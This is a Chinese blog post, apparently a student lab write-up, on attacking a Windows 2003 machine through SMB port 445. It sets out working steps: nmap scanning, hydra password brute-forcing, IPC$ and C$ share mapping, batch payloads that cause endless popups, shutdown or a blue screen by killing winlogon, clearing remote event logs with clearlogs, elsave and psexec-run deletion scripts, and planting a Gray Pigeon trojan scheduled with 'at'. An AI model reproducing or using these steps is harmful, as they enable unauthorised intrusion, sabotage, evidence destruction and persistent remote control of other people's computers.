445端口攻击

 

一、简单的渗透攻击

1、端口

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNjE5NDg0OTM=,size_16,color_FFFFFF,t_70,g_se,x_16

 首先要先了解了解一下一些基本的端口所对应的服务:

1)FTP:文件共享服务

2)SSH:专为远程登陆会话和其他网络服务提供安全性的协议,有效防止远程管理过程中的信息泄露问题(比telnet安全)

3)telnet: Internet远程登录服务的标准协议和主要方式

4)SMTP: 建立在FTP文件传输服务上的一种邮件服务

5)DNS : 域名解析服务

6)HTTP 、HTTPS:超文本传输协议(建立在TCP,HTTPS比HTTP更安全)

7)共享文件夹:可以在局域网中轻松访问各种共享文件夹或共享打印机(初衷微软是为了提供给用户方便)

8)MYSQL、PstgreSQL、SQL Server :数据库操作系统。(其中MYSQL和SQL Server用的广泛)

9)TCP:传输控制协议(计算机网络,传输层,和IP协议搭配使用)

10)Nginx:一款轻量级的Web服务器/反向代理服务器及电子邮件代理服务器。

11)redis:远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API

 

2、攻击

1)上号(kali、windows7、windows2003)

  • kali拥有着较为全面的工具,方便使用者操作,这里我们用到的是namp和九头蛇

namp:端口扫描器,扫描出对方端口号的开放情况,利用其不同端口号所存在的漏洞,达到攻击的目的。

九头蛇(hydra):是一款爆破工具,和社团实验的burp的原理相同。

  • kali和windows7在此处都是攻击机,而2003是靶机

 

2)打开kali,使用nmap和hydra工具(扫描、渗透)

  • 利用nmap工具可以快速的探测出对方机器开设了哪些端口号,通过对应的端口号存在的漏洞进行漏洞利用

    还一个一个ping?!

nmap命令

namp 10.1.1.1 \\扫描ip为10.1.1.1的端口
-sP \\Ping 扫描
-sV  \\服务版本探测
-O    \\启动操作系统探测
-A     \\全面扫描
-oN     \\保存txt--做一个记录

(在此次实验中我们用的便是445端口好存在的一个漏洞对服务器发起攻击。)

  • 接着使用hybra进行密码爆破

    疯狂的向服务器发出请求,一个密码一个密码的试,一旦成功,则反馈给我正确的密码(碰运气)

hydra命令

 对于破解不同的协议,命令之间有所不同
 例如:
 使用hydra破解ssh的密码
  hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh
  破解smb:
  hydra -l administrator -P pass.txt IP smb
​
 在此实验中:我们用第二个命令,smb端口是445/139
  • 然后得到用户密码(2003默认用户名为administrator),转到windows7上,win+r输入cmd打开窗口,输入如下命令

net use \\10.1.1.1\ipc$ 密码/user:用户
\\建立ipc$,获得默认共享
net use z: \\10.1.1.1\c$ 
\\将2003的c盘映射到本地机上

名词解释:ipc$——IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 IPC$ 是 NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个 IP 之间只允许建立一个连接。 NT/2000 在提供了 ipc$ 功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享 (c$,d$,e$ …… ) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。

  • 待上述命令完成后,我们已成功与对方建立链接,他的默认共享我可通通映射到本机电脑上,他所存储的绝大部分信息我通通可看

 

  • 此时我可写一个批处理文件,放入对方c盘下的启动文件夹下,待到对方在此启动时,对方电脑自动运行批处理命令,批处理命令如下:

:d
start
goto d
\\一个简单的批处理文件

此条批处理用了三句极其简单的语句制作了一个死循环,一旦运行,就会造成无限弹窗的情况

或是写入下面批处理,可自动关机

shutdown -s \\自动关机

或是写入下面程序,造成蓝屏情况

ntsd -c -q -pn winlogon.exe

\强制注销winlogon.exe进程,winlogon.exe是开机启动进程,无法注销,故导致蓝屏

在此之前,你可以把你想要的文件信息全部拷到你的本机上。

3.删除日志文件,利用工具(clearlogs等等)

由于建立 IPC$ 连接的操作会在 Event Log 中留下记录,不管是否成功,所以必须对日志文件进行删除。

提供的第一种方法便是利用工具,不得不说工具确实是最方便的,它不需要你知道什么原理,知道怎么用就行,下面给大家展示两个工具

1.clearlogs,

命令如下:(此处提到了三个日志文件)

Windows主要有以下三类日志记录系统事件:应用程序日志、系统日志和安全日志。

系统日志

记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。系统日志中记录的时间类型由Windows NT/2000操作系统预先定义。

默认位置: %SystemRoot%\System32\Winevt\Logs\System.evtx

应用程序日志

2)包含由应用程序或系统程序记录的事件,主要记录程序运行方面的事件,例如数据库程序可以在应用程序日志中记录文件错误,程序开发人员可以自行决定监视哪些事件。如果某个应用程序出现崩溃情况,那么我们可以从程序事件日志中找到相应的记录,也许会有助于你解决问题。

默认位置:%SystemRoot%\System32\Winevt\Logs\Application.evtx

安全日志

3)记录系统的安全审计事件,包含各种类型的登录日志、对象访问日志、进程追踪日志、特权使用、帐号管理、策略变更、系统事件。安全日志也是调查取证中最常用到的日志。默认设置下,安全性日志是关闭的,管理员可以使用组策略来启动安全性日志,或者在注册表中设置审核策略,以便当安全性日志满后使系统停止响应。

默认位置:%SystemRoot%\System32\Winevt\Logs\Security.evtx

clearlogs \\192.168.0.45 -app  \\清除远程计算机的应用程序日志。
​
clearlogs \\192.168.0.45 -sec  \\清除远程计算机的安全日志。
​
clearlogs \\192.168.0.45 -sys  \\清除远程计算机的系统日
​

2.elsave

elsave [-s\server] [-l log] [-F file] [-C] [-q]

其中各个参数的含义如下:

-s\server:指定远程计算机。

-l log:指定日志类型,其中参数”application”为应用程序日志,参数”system”为系统日志,参数”security”为安全日志。

-F file:指定保存日志文件的路径。

-C:清除日志操作(注意”-C”要大写。)

-q:把错误信息写入日志。

在本地命令提示符窗口中分别输入如下命令,即可删除远程计算机中的日志文件。

清除应用程序日志命令:elsave -s\192.168.0.45 -l application -C。

清除系统日志命令:elsave -s\192.168.0.45 -l system -C。

清除安全日志命令:elsave -s\192.168.0.45 -l security -C。

之后在本地命令提示符窗口中输入”net use\ip\ipc$/ del”命令,即可断开IPC$连接。这样黑客便成功地删除了远程主机中的事件日志。

 

除了上述两种工具,其实还有很多,当然你也可以通过下列批处理命令删除日志

   @del c:\winnt\system32\logfiles\*.*
  @del c:\winnt\system32\config\*.evt
  @del c:\winnt\system32\dtclog\*.*
  @del c:\winnt\system32\*.log
  @del c:\winnt\system32\*.txt
  @del c:\winnt\*.txt
  @del c:\winnt\*.log
  @del c:\del.bat

在此可再建一个批处理命令来控制上面的批处理

   @copy del.bat \\ip\c$
  @echo 向肉鸡复制本机的del.bat……OK
  @psexec \\ip c:\del.bat
  @echo 在肉鸡上运行del.bat,清除日志文件……OK

总:对比可知,手动命令清楚并不是个好选择。

4.留后门

可利用灰鸽子制作,当他下次在登陆之时,可直接运行木马(需要在植入木马时将木马弄成开机自动开启),通过灰鸽子做到远程控制对方电脑。开心心。

1.首先打开灰鸽子,制作木马。

2.将此木马通过建立的ipc$复制到对方的c盘或d盘下,或是放在对方电脑的启动文件夹下,这样对方一登陆电脑,就会自动启动木马程序,我们进而可以控制对方电脑。

3.设置目标主机运行木马

net time \\10.1.1.1
at \\10.1.1.1 18:00 d:\server.exe

4.成功控制对方

5.相关法律——(网安人员绝不搞破坏)

 

二、渗透攻击的大概步骤

在上述实验中的大致步骤:

1.信息搜集

2.端口扫描

3.漏洞利用

4.破坏或留下后门

渗透测试程序

 

渗透测试分为 白盒测试黑盒测试

  • 白盒测试就是在知道目标网站源码和其他一些信息的情况下对其进行渗透,有点类似于代码分析

  • 黑盒测试就是只告诉我们这个网站的url,其他什么都不告诉,然后让你去渗透,模拟黑客对网站的渗透

以黑盒测试为例

1.信息收集: 根据目标的URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站操作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息。更多的关于信息收集。

2.漏洞探测: 目的是探测网站所存在的一些常见的漏洞。(比如sql注入,xss等)可利用漏洞扫描工具进行扫描。

3.漏洞利用:不同的漏洞有不同的利用工具,很多时候,通过一个漏洞我们很难拿到网站的webshell,我们往往需要结合几个漏洞来拿webshell。但是,获得了webshell后,一般权限很低,所以我们需要提权。(反弹shell等)

4.内网转发:在渗透测试中,当我们获得了外网服务器的一定权限后发现这台服务器可以直接或者间接的访问内网。此时渗透测试进入后渗透阶段,一般情况下,内网中的其他机器是不允许外网机器访问的。这时候,我们可以通过端口转发(隧道) 或将这台外网服务器设置成为代理,使得我们自己的攻击机可以直接访问与操作内网中的其他机器。实现这一过程的手段就叫做内网转发

5.内网渗透,通过web服务器,横向获得你想要的其他服务器的资料。因为一台服务器电脑所控制的不止一台服务器,所以在拿到webshell后在服务器的电脑上尽可能多的去收集其他服务器的一些资料。

6.痕迹清除:清除你来时的痕迹,不要让对方管理员发现你。

6.写报告:做完渗透测试后,大伙坐下来,点杯奶茶,总结一下,写一份详细的报告,给委托方。

三.总结

通过在实验中的操作和对渗透测试的总结中,可定下一个大致的学习方向

1.去了解了解一些存在的漏洞和对应的攻击方式,再去找到相应的工具进行一个熟练的使用。

2.在学习工具使用的过程中,千万别忽视原理的重要,原理是帮助你去理解一个工具是怎么工作的,从而让我们更容易去理解他(当然因为相当一部分工具时英文,所以英文是极其重要的)

3.一切从基础开始,c语言(许许多多的语言都是基于c语言的),计算机网络的一些基础原理等等。

4.对于系统的一些操作,例如linux系统的命令行,windows的命令行要有基本的掌握,在做实验时一定要清楚我每一步的要干什么,基于什么原理,怎么做,为什么要做。

 

  • 3
    点赞
  • 48
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值